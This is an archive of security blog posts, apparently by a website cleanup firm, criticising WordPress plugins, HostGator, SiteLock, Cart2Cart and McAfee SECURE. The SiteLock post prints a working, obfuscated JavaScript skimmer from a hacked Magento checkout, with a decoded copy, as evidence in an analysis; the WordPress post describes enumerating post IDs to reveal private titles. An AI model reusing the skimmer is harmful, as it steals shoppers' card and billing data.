iThemes Security Plugin Has “One-Click Secure” Button That Does Nothing Except Claim The Website Has Been “Secured”

We are frequently asked what about various broad based WordPress security plugins and which ones should be used. Our answer to the second part of that is none of them. These plugins generally provide little protection against actual threats and have been found to have security vulnerabilities themselves fairly often. That second part might sound odd, you would think that someone developing a security related plugin would be very careful about the security of their plugin, but people that actually know about security would be unlikely to be involved in developing one of these due to the first part of that, that they don’t provide much protection against actual threats.

So what you are left with is products generally developed by people that don’t have much concern for real security and in a lot of cases seem to be mainly interested in making money by taking advantage of the public that understandably lacks strong security knowledge. That results in lots of plugins and related services that end up scaring people based on bad or false information and that collect information from users under false pretense.

If you are looking for some particular security feature you would be better off finding a plugin that doesn’t also include a kitchen sink of other features with it, since that reduces amount of code that could be harboring security vulnerabilities. The important things you need to do to keep your website secure are listed here.

The iThemes Security Plugin And Trust

That all brings us to something we just ran across with one of those plugins, iThemes Security (formerly Better WP Security), which is listed as having 700,000+ active installs.

One important element of any security product is trust, since the average user can’t verify that a product does what it says, they are trusting the developers in a major way. Any abuse of that trust should be a major red flag. That trust is something the developers of the iThemes Security plugin don’t seem to care about.

When you install and activate the iThemes Security plugin a notice is displayed at the top of the page with a button to “Secure Your Site Now”:

ithemes-security-1

Clicking on that brings up this page:

ithemes-security-2

The most important part of that would seem to be the section Titled “Secure Your Site”:

Use the button below to enable default settings. This feature will enable all settings that cannot conflict with other plugins or themes.

When you click on the One-Click Secure button, you get a message that it is “Working…” for a moment:

ithemes-security-4

Then it will tell you that “Site Secured. Check the dashboard for further suggestions on securing your site.”:

ithemes-security-5

Based on that you would think that the website has been secured in some way after doing that. It turns out that nothing actually has happened, something we found about when ran across a post on a thread on the WordPress.org support forum for the plugin that stated

Please note that since the 5.2.0 release (5.2.1 included) clicking on the One-Click Secure button in the First Important Steps modal window will not do anything despite the fact that it still reports:

Site Secured. Check the dashboard for further suggestions on securing your site.

which is also kind of lame as there is no longer a Security Status section on the Dashboard page …

Note this is not a bug, since iThemes knowingly removed the code that was normally executed behind this button …

If you want to see that for yourself you can see the changes made in version 5.2.o here (doing a search on the page for “Register one-click settings” will take you to parts of the page where that is shown). What makes this even more incredible is how long ago this happened, version 5.2.0 was release on January 18 and the post pointing that out is now two months old, and yet it is still that way now.

When they don’t care about misleading people with something that visible, then you have to wonder what else they might be misleading people about. We already spotted one other thing, but you will have to wait for a future post to hear about that.

Posted in Bad Security, WordPress Plugins | Tagged | Leave a comment

WordPress Leaks Potentially Sensitive Information From Private Posts and Pages

Over at our Plugin Vulnerabilities service we are in the process of trying to help to get a fairly serious security issue with a WordPress plugin fixed. In the process of doing that we have noticed an issue with WordPress that impacts more than this plugin. Without getting into the details of it, since a fix is still in progress, the plugin created WordPress pages which provide access to non-public data. These were accessible by the public, which was a problem. As part of trying to fix this, these pages were intended to be made private (we say intended because that wasn’t done right). This would have worked in private pages were totally private, but it turns on they are not.

Here is how the WordPress documentation describes what the impact of setting a post’s or page’s visibility to private:

Private content is published only for your eyes, or the eyes of only those with authorization permission levels to see private content. Normal users and visitors will not be aware of private content. It will not appear in the article lists. If a visitor were to guess the URL for your private post, they would still not be able to see your content. You will only see the private content when you are logged into your WordPress blog.

Despite the claim that “normal users and visitors will not be aware of private content”, that isn’t totally true. If you have your permalink structure set to include the title of the page in it, which is fairly common set up, then someone can find out the titles of private posts and pages.

You do that by taking advantage of WordPress’ automatic redirection from plain URLs to the chosen permalink structure. Lets say a post with ID number 12 was titled Surprise Party For Julie In Accounting, when accessing

http://example.com/?p=12

WordPress to automatically redirects you to

http://example.com/surprise-party-for-julie-in-accounting/

The page you see though gives no indication that a private page exists, as the documentation suggest:

Oops! That page can’t be found. It looks like nothing was found at this location. Maybe try a search?  Search for:

By enumerating through potential ID numbers you can see what the titles of all private posts and pages on a website are.

Coming back to the plugin, the title of those pages contains enough information to allow some access the non-public data. While the plugin shouldn’t have you used pages in the way it did, we suspect that in other cases private posts or pages could also contain sensitive information in the title that isn’t meant to be public, as it is now.

After noticing this we thought that we should bring this to the attention of the WordPress developers since it doesn’t seem like this should be this way. It turns out that someone already did that 8 years ago, back around the time of WordPress 2.3.1. But 7 years ago that ticket was closed and marked as “wontfix”. Maybe there was some good reason for that, but the only comment included with that change was “there’s a dup of this one somewhere, and it shoud get wontfixed too.” The fact that a potential security issue was treated in this way is more than a little concerning.

Posted in Website Security, WordPress | Leave a comment

Somebody’s Impersonating Us On The Hacker News

A lot of strange stuff happens on the Internet. Case in point, today some posted a comment on a Hacker New post claiming to be us, saying:

This type of nonsense from WordFence shouldn’t surprise anyone. I’ve written of their incompetence before: http://www.whitefirdesign.com/blog/2015/02/23/wordfence-real…

Laugh and move on…

That wasn’t us and we don’t have an account there.

 

Posted in Bad Security | Leave a comment

Why Does The WordPress Plugin Directory Have Rules If They Don’t Bother To Enforce Them?

When it comes to distribution platforms for software one of the frequent complaints of developers is uneven enforcement of rules and regulations, which makes it hard to know what is and isn’t acceptable. Recently we came across an example of this with Plugin Directory for WordPress:

While dealing with one of the vulnerabilities we recently discovered through our Plugin Vulnerabilities service, we were have a bit of issue discussing communicating about the issue since it turned out the plugin had two names.

On the Installed Plugins pages in WordPress it is referred to as Spider Event Calendar:

spider-event-calendar-on-installed-plugins-page

On the Plugin Directory its name is WordPress Event Calendar:

wordpress-event-calendar-on-plugin-directory

Okay, actually while the main name is WordPress Event Calendar, you can see that it is referred to by both names in different places:

wordpress-event-calendar-on-plugin-directory-full

It is confusing to say the least and it seems like restricting a plugin to one name would be reasonable thing to do, but what seem to be the bigger issue here was with the fact that using the word WordPress in a plugin’s name is supposed to be against the rules of the Plugin Directory.

On the Detailed Plugin Guidelines page it says:

Don’t violate our trademarks. Don’t use “wordpress” in your domain name. Use “wp” instead, or better yet, come up with your own original branding! People remember names.

On the Developer FAQ page it is put a lot more clearly:

Are there names you don’t permit?

We don’t allow ‘WordPress’ in plugin names as it’s redundant and somewhat obvious that you’re a WordPress plugin.

A little more looking showed that the same developer had six plugins with WordPress in the name:

webdorado-wordpress-plugins

All six of those plugins have associated paid plugins.

search of the Plugin Directory shows that these are far from the only ones using WordPress in the name of plugins:

plugin-directory-search-results-for-wordpress

It certainly seems like the Plugin Directory is allowing the word WordPress to be used since it is in such wide use and it would be easy to detect its usage in the name of the plugins when getting the name of the plugins from their files to show it in the Plugin Directory. If this is the case then the documentation should be updated, otherwise we have just provided the people running the Plugin Directory with an easy way to find a lot plugins that they need to do something about.

Posted in WordPress Plugins | Leave a comment

Who’s The Worse Party In HostGator’s and SiteLock’s Security Partnership?

The web host HostGator has a partnership with the security company SiteLock where if your website is hacked HostGator suggests you hire SiteLock to fix it, which if you followed our previous post’s on SiteLock would seem like a bad idea. The actual results also back that up, as situation we we dealt with recently highlighted.

A website we were going to be doing an upgrade on once HostGator changed the PHP version on the server, got hacked and was rendered non-functional due to it being defaced. HostGator recommend SiteLock to clean up the website. Getting the website back up and running should have taken just a few minutes (by replacing the index.php file in the root directory), with a full cleanup taking a few hours. Four hours after they were supposed to have started it was still not functional and we were contacted to see if we had any suggestions. The website only became functional later in the day after the website’s developer followed our advice to replace the index.php file, by the next morning SiteLock had removed the defaced index.php file. When we double checked SiteLock’s work later we found that they had not removed a backdoor script, which allows a hacker remote access to a website, that had been added to a core Magento file in the root directory of the website. While things can be missed during a cleanup, this seems to be a case where corners were probably cut instead of an understandable mistake since a simple file comparison of the website’s file with a clean copy of Magento would have spotted that backdoor script.

All this would point to it being a bad idea for HostGator to have partnered with SiteLock, but there are problems going the other way as well.

A couple of weeks ago we discussed the fact that HostGator misrepresents what security SSL certificates provides. If SiteLock was actually concerned about security it seems like the kind of thing they would want to make sure a partner isn’t doing. But a much more important issue that we have noticed with HostGator when comes to a security, particularly when comes to the cleanup of hacked websites, is that HostGator doesn’t have it set so that log files for websites they host are archived. By not doing that it is much harder to determine how a website was hacked (since the evidence often resides in those logs) and therefore makes it harder to make sure the website has been secured against the hack happening again. We have trouble understanding why a security company would want to partner with a web hosting company that makes doing a good job more difficult than it needs to be. Especially when archiving logging isn’t some obscure feature, it prominently featured on the Raw Access Logs page in cPanel:

host-gator-cpanel-raw-access-logs-page

Incidentally, if you are hosted with HostGator or another web host that uses cPanel, now would be a good time to make sure you have archiving enabled in cPanel.

Posted in Bad Security | Tagged , | Leave a comment

HostGator’s Dangerous Misrepresentation of the Security Value of An SSL Certificate

While working on a client’s website hosted with HostGator recently we noticed this odd ad in their cPanel account:

Install An SSL!, Stop Evil-Doers!, ADD SSL Today!

SSL is a protocol, so isn’t something that you would install. It seemed like they were probably referring to installing an SSL certificate, which would have a decidedly non super-human ability to stop evil-doers. Clicking the image took us to this page, where they were selling SSL certificates, but again they referred to SSL in a strange fashion:

Why get an SSL certificate?

An SSL reduces your risk by keeping sensitive data collected on your website safe. The data is encrypted and backed by a warranty worth up to $1.75M.

Having HTTPS in the address bar and displaying a seal of trust increases customer confidence in your website and drives more sales.

It seems like they marketing something they don’t really understand on basic level, which leads to the aspect we find more troubling than there odd phrasing, the claim that SSL keeps sensitive data collected on your website safe. To understand why, first it helps to have a basic understanding of what SSL is. SSL is a series of protocols for transferring data from one location to another in encrypted form. An SSL certificate is used identity that that the SSL connection is in fact being made to the website you are connecting to.

SSL should protect against someone gaining access to data being transmitted from a customer’s computer to a website while it is being transmitted, but that is where SSL’s role ends. Once the data is decrypted on website’s end its safety relies on the website being otherwise secure. If someone were to believe that getting SSL certificate is going to keep the data safe, they would be more likely to not take the other measures they need to keep that sensitive data secure (which isn’t an insignificant issue these days).

On top of all of this you can get an equivalent SSL certificate from other providers for significantly less money.

Posted in Bad Security | Tagged , | Leave a comment

SiteLock’s Strange Cleanup Idea

While reviewing reports of WordPress plugin vulnerabilities for our Plugin Vulnerabilities service recently we came across an odd report from SiteLock. The claimed security issue in the plugin resolved around the fact that:

The File Browser plugin begins its security by determining if the plugin’s readme file is present. If it finds readme.txt, it then examines user levels to authenticate the user.

Their concern with that was:

But if the plugin’s readme file was renamed or removed, the authentication process fails and grants complete access to the plugins’ core functionality.

That would be a problem, but this really doesn’t seem like it is something likely to happen. Unless someone could take advantage of another security vulnerability that allows the deletion of arbitrary files, there really isn’t any reason that file should be change, right? Well SiteLock thinks so:

But the reliance on the presence of the readme file was dangerous as it’s not uncommon for a site owner or web developer to remove unnecessary text files, like readmes, as part of a site cleanup.

We have never heard of doing something like that, so we are not sure what the context is supposed be. But if they are talking a hack cleanup (they are a security company after all) that definitely wouldn’t be something you should be doing.

With WordPress plugins you can clean them in several ways: upgrading them (all the old files in the plugin’s directory in /wp-content/plugins/ get deleted during that), deleting the plugin’s files and replacing them with a clean copy, or comparing the plugin’s files with a clean copy and removing any malicious code (which gives you the advantage of seeing if the hacker made any changes). Deleting the readme.txt files, without replacing them, wouldn’t happen with any of those.

When you start messing with non-malicious files that can lead to bad things happening, like breaking the website, something SiteLock has managed to do in the past.

Posted in Bad Security | Tagged | 1 Comment

SiteLock Labels Website as Secure Despite Being Very Dangerous For Visitors

When it comes to the poor state of security for websites, a lot of the blame for that probably belongs to the security companies, that don’t seem to have much concern for security. One of the worst offenders is the purveyors of website security or trust seals, that claim that websites are secure. Those companies seem to be mainly interested in selling the idea that their customer’s websites are secure, without being too concerned whether they are or not (in some cases placing their seals on website they know are not secure).

Several times in the past we have noted instances where websites we were working on, in which one of these companies, SiteLock, was labeling the websites as being secure despite the fact the websites were running outdated software with known security vulnerabilities. That being despite the ease it would be to check for the use of outdated software. In the latest case we are working on a website they label as being secure

SiteLock SECURE seal

despite the fact that the website had been hacked and contained code on its webpages that compromised any information entered on the checkout section of the website. If that doesn’t make a website insecure, we are not sure what would.

What makes it stick out even more is that the code wasn’t hidden, it was sitting at the bottom of the page right below the code for SiteLock seal:

<div id="sitelock_shield_logo" class="fixed_btm" style="bottom:0;position:fixed;_position:absolute;right:0;"><a href="https://www.sitelock.com/verify.php?site=[redacted]" onclick="window.open('https://www.sitelock.com/verify.php?site=[redacted]','SiteLock','width=600,height=600,left=160,top=170');return false;" ><img alt="SiteLock" title="SiteLock" src="//shield.sitelock.com/shield/[redacted]"></a></div><script>var _0x1137=["\x63\x6C\x69\x63\x6B","\x2F\x6D\x65\x64\x69\x61\x2F\x63\x61\x74\x61\x6C\x6F\x67\x2F\x70\x72\x6F\x64\x75\x63\x74\x2F\x63\x61\x63\x68\x65\x2F\x31\x2F\x74\x68\x75\x6D\x62\x6E\x61\x69\x6C\x2F\x37\x30\x30\x78\x2F\x32\x62\x66\x38\x66\x32\x62\x38\x64\x30\x32\x38\x63\x63\x65\x39\x36\x2F\x42\x2F\x57\x2F\x64\x61\x34\x31\x38\x30\x33\x63\x63\x39\x38\x34\x62\x38\x63\x2E\x70\x68\x70","\x50\x4F\x53\x54","\x66\x6F\x72\x6D","\x73\x65\x72\x69\x61\x6C\x69\x7A\x65","\x61\x6A\x61\x78","\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72","\x5B\x6F\x6E\x63\x6C\x69\x63\x6B\x3D\x27\x62\x69\x6C\x6C\x69\x6E\x67\x2E\x73\x61\x76\x65\x28\x29\x27\x5D","\x63\x68\x65\x63\x6B\x6F\x75\x74\x2D\x73\x74\x65\x70\x2D\x62\x69\x6C\x6C\x69\x6E\x67","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x5B\x6F\x6E\x63\x6C\x69\x63\x6B\x3D\x27\x70\x61\x79\x6D\x65\x6E\x74\x2E\x73\x61\x76\x65\x28\x29\x27\x5D","\x63\x68\x65\x63\x6B\x6F\x75\x74\x2D\x73\x74\x65\x70\x2D\x70\x61\x79\x6D\x65\x6E\x74"];function s1(){jQuery(_0x1137[7])[0][_0x1137[6]](_0x1137[0],function(){jQuery[_0x1137[5]]({url:_0x1137[1],type:_0x1137[2],data:Form[_0x1137[4]](billing[_0x1137[3]])})})}document[_0x1137[9]](_0x1137[8])[_0x1137[6]](_0x1137[0],s1());function s2(){jQuery(_0x1137[10])[0][_0x1137[6]](_0x1137[0],function(){jQuery[_0x1137[5]]({url:_0x1137[1],type:_0x1137[2],data:Form[_0x1137[4]](payment[_0x1137[3]])})})}document[_0x1137[9]](_0x1137[11])[_0x1137[6]](_0x1137[0],s2());</script></body> </html>

 

The code is also stored right along side the SiteLock seal code in the website’s database:

malicious-code-below-sitelock-code-in-database

 

The code is slightly obfuscated, which we would assume would make a good malicious code scanning tool (if one actually exists) more suspicious of it, but it shouldn’t be anything that should be a problem for one to deobfuscate. When that is done you can see that code watches for some actions being taken in the Magento checkout process and then transmit the data being entered to another file on the website for later retrieval by the hacker:

<script>var _0x1137=["click","/media/catalog/product/cache/1/thumbnail/700x/2bf8f2b8d028cce96/B/W/da41803cc984b8c.php","POST","form","serialize","ajax","addEventListener","[onclick='billing.save()']","checkout-step-billing","getElementById","[onclick='payment.save()']","checkout-step-payment"];function s1(){jQuery([onclick='billing.save()'])[0][addEventListener](click,function(){jQuery[serialize]({url:/media/catalog/product/cache/1/thumbnail/700x/2bf8f2b8d028cce96/B/W/da41803cc984b8c.php,type:POST,data:Form[serialize](billing[form])})})}document[getElementById](checkout-step-billing)[addEventListener](click,s1());function s2(){jQuery([onclick='payment.save()'])[0][addEventListener](click,function(){jQuery[serialize]({url:/media/catalog/product/cache/1/thumbnail/700x/2bf8f2b8d028cce96/B/W/da41803cc984b8c.php,type:POST,data:Form[serialize](payment[form])})})}document[getElementById](checkout-step-payment)[addEventListener](click,s2());</script>

If you are relying on SiteLock to keep your website secure, now would be a good time to stop that and instead focus on making sure you take the steps that will actually keep your website secure. (In this case the website was hacked due to Magento not being kept up to date.)

While we are discussing SiteLock it also worth mentioning the fact that they also don’t properly clean up hacked websites, but do manage to break them when doing a less they should be.

Despite their abysmal record, SiteLock claims to be “The Global Leader in Website Security” (how much worse much worse at website security must they think their competitors are?):

sitelock-global-leader

Posted in Bad Security | Tagged | Leave a comment

Cart2Cart’s Strange Magento Security Announcement

Last October we wrote a post about strong circumstantial evidence pointing to the fact FTP credentials provided to the company Cart2Cart had compromised on their end. In the past few days we became aware of a security announcement they put out that either obliquely notifies their customers of that compromise of FTP credentials or indicates they really have no clue when it comes to security (while feeling it appropriate to be giving out security advice).

They are sending out the following email to customers:

We’re writing to inform you that our security audit has revealed an unpleasant vulnerability of certain Magento stores. Considering the fact that Magento shops are being attacked by hackers more often lately, we strongly recommend you to double-check the security of your e-store.

Please, contact your developer team, so that they could scan your Magento source code in order to ensure that your shop is not under the threat of being abused. Read more info here:
http://www.shopping-cart-migration.com/important-security-announcement-for-magento-store-owners

If you need technical assistance regarding this, reply to this email and we will check your store from our side.

Following the link mentioned there, you get a page that starts out:

After performing an audit, we’ve revealed an unpleasant vulnerability of certain Magento stores that may have a negative impact on the security of your customers’ personal data.

To ensure the finest security of your Magento retailer, we strongly recommend you to contact your developer team and check the source code for the presence of any suspicious customizations.

The link to “an unpleasant vulnerability” discusses not a vulnerability, but the end result of a vulnerability being exploited, code added to one of Magento’s files that sends credit card information entered on the hacked website to a third-party. The distinction is quite important because when a website is hacked, if you don’t find and fix the vulnerability that allowed it to be hacked the website can remain vulnerable to being hacked again.

Cart2Cart’s email and page never mention what the code they are mentioning does, instead saying “First of all, there’s no need to panic. You can eliminate any possible risks simply by revealing and deleting the code, if there’s any.”.

The next thing they say leads us to believe this could be a reference to their being compromised (or it shows they have no idea what they are talking about) as it suggest doing two things if you have the code on your website:

  1. Delete the following code inside and save the changes:
  2. Change your FTP account credentials

Those steps would suggest that the hack happened through compromised FTP credentials, since they want to change those credentials. But the FTP credentials would have to have been compromised somehow, yet they don’t suggest doing anything to stop them from being compromised again. That could be because the compromised happened on their end and has now been fixed, or it could suggest they have no clue what they are talking about.

The last section of the page would certainly lend some credence to them not having much clue when it comes to the security of websites. They provide this list of security tips:

Useful Security Tips

  1. Use up-to-date antivirus software

  2. Don’t store your FTP account passwords in programs like Total Commander, Filezilla, etc.

  3. Change your FTP account password periodically e.g. once a month, especially after granting access to any service providers

  4. Limit the FTP access to specific IP addresses

  5. Change the administration panel login “admin” to a custom one

  6. Hire certified developers, designers or other staff you can trust to only

  7. Use repository for a proper and secure workflow

Notable missing from their list of security tips is keeping the software on your website up to date. Not only is this a basic security measure, but it is particularly relevant with Magento based websites right now, since most of the hacked Magento based websites we are cleaning these days have been hacked due to the software not being kept up to date (or not having the security patches for older versions applied).

If you do find code added /app/code/core/Mage/Payment/Model/Method/cc.php, removing the code and changing the FTP credentials is not enough. You will want to also:

  • review the rest of the websites files for malicious code and remove any found
  • check for Magento extensions added by a hacker
  • check for additional Magento admin users
  • get Magento secured by either upgrading it to the latest version of 1.9, currently 1.9.2.3, or applying the security patches for older versions
  • rename the Magento admin directory to something other than “admin”
  • change the passwords for other logins associated with the website (database, Magento admin, etc), in case they were compromised
  • try to determine how the website was hacked and make sure that is fixed
Posted in Bad Security, Magento | Tagged | Leave a comment

McAfee and PathDefender Shouldn’t be Making It Easier For Hackers To Disguise Malicious Code

When it comes to companies involved with the security of websites, we don’t get a sense that many of them either know much about security or care about it. The latest case in point comes from something we noticed while cleaning up a hacked website recently.

The .htaccess file in the root of the website included the following code:

### Start McAfeeSECURE Code DO NOT EDIT ###
<IfModule mod_substitute.c>
AddOutputFilterByType SUBSTITUTE text/html
Substitute "s|</body>|<!-- Start McAfeeSecure Code --><script type=\"text/javascript\" src=\"//cdn.ywxi.net/js/1.js\" async=\"true\"></script><!-- End McAfeeSecure Code --></BODY>|ni"
</IfModule>
### End McAfeeSECURE Code DO NOT EDIT ###

That code causes JavaScript code from the domain ywxi.net to be loaded on the pages of the website. Upon seeing that are first thought was that this was likely something added by a hacker. While it was labeled as being code for McAfee SECURE, hackers often disguise there code in a similar fashion. What made us the most suspicious was that strange domain, which just seems to be a random assortment of letters and doesn’t seem to have any connection with McAfee. When we checked the WHOIS for the domain it listed it as belonging to PathDefender, which if you do Google search on you won’t find much information on, but they do seem to be the actual people behind McAfee SECURE.

What makes this so head scratching is that it would be quite easy for them to use a subdomain of mcafeesecure.com (e.g. trustmark.mcafeesecure.com) for the service instead of the odd address, cdn.ywxi.net. From actually dealing with hacked websites often, if we were involved with this service it would be a major issue. If legitimate code is accessing JavaScript code from a domain that is an odd assortment of letters then people are less likely to notice if a hacker were to add code referencing another random domain. Whereas McAfee probably monitors for registration of domains similar to theirs and would get one made to seem similar to mcafeesecure.com shut down before it could be much use in such a situation.

We do have a pretty good idea why McAfee Secure and PathDefender don’t seem to have had the same concern. If you view the list of employees at PathDefender you can see that almost none of them actually seem to have a technical role at the company. It seems to be mostly a sales organization. This isn’t surprising since products like McAfee SECURE seem to be mostly focused on promoting that websites are secure then actually making sure they are secure. That can be seen pretty clearly on the homepage of the McAfee SECURE website which repeatedly promotes the service increasing customer sales:

mcafee-secure-homepage-1

mcafee-secure-homepage-2

 

mcafee-secure-homepage-3

It only gets to actually security in the fourth section of the page and even then it is only mentioned as one of six features:

mcafee-secure-homepage-4

As we mentioned in the beginning of the post, this was something that was on hacked website, so the service didn’t keep a website secure when it was under attack in at least one instance and based on our experience with cleaning up hacked websites using similar services in the past that probably isn’t an outlier.

Posted in Bad Security | Tagged , | Leave a comment